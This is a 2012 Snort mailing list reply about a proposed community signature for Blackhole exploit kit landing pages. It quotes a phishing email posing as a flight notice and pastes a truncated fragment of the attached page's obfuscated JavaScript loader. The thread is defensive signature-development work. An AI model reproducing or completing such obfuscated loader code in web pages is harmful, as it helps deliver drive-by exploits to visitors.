Snort mailing list archives

Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq"

From: Matt Olney <molney () sourcefire com>
Date: Thu, 1 Mar 2012 09:45:47 -0500

Nathan, Got an email entitled:

Fwd: Your Flight N 91-17249698
It had an attached html file with the following html (recognize it? :))

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "
http://www.w3.org/TR/html4/loose.dtd";>
 <head>
  *<title>Please wait untill the page loads...</title>*
 </head>
<h1>Please Wait... Loading... </h1><br>

<script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new
locat*ion();}catch(qqq){ss*=String;if(aa

Etc...

Good rule :)

Matt

On Wed, Feb 29, 2012 at 4:35 PM, Community Signatures